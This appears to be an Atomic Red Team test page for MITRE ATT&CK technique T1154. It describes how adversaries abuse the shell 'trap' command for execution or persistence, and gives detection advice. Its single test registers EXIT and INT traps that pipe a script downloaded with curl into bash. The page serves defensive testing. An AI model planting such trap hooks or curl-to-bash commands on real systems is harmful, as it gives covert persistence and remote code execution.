# T1154 - Trap
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1154)
<blockquote>The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common  keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where "command list" will be executed when "signals" are received.

Detection: Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.

Platforms: Linux, macOS

Data Sources: File monitoring, Process Monitoring, Process command-line parameters

Permissions Required: User, Administrator

Remote Support: No</blockquote>

## Atomic Tests

- [Atomic Test #1 - Trap](#atomic-test-1---trap)


<br/>

## Atomic Test #1 - Trap
After exiting the shell, the script will download and execute.

After sending a keyboard interrupt (CTRL+C) the script will download and execute.

**Supported Platforms:** macOS, CentOS, Ubuntu, Linux


#### Run it with `sh`!
```
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
exit
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT
```
<br/>
